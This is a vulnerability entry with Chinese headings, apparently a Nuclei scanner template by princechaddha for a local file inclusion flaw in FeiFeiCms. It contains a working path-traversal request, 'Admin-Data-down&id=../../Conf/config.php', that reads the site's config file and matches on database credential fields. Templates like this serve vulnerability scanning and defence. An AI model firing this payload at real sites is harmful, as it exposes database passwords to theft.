漏洞描述
FeiFeiCms is vulnerable to local file inclusion.
feifeicms-lfr: FeiFeiCms - Local File Inclusion
PoC代码[已公开]
id: feifeicms-lfr
info:
name: FeiFeiCms - Local File Inclusion
author: princechaddha
severity: high
description: FeiFeiCms is vulnerable to local file inclusion.
reference:
- https://www.cnblogs.com/jinqi520/p/10202615.html
- https://gitee.com/daicuo/feifeicms
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: feifeicms,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?php"
- "db_name"
- "db_pwd"
- "db_host"
condition: and
part: body
# digest: 4b0a00483046022100fe99c461f94c006240fd6bfc917bdfa191f30882c4d339098a06713a1a9df1a6022100d31a4d5a887e7caadf93b05b5e66443aa52485f56b561d972674d037a8e3e211:922c64590222798bb761d5b6d8e72950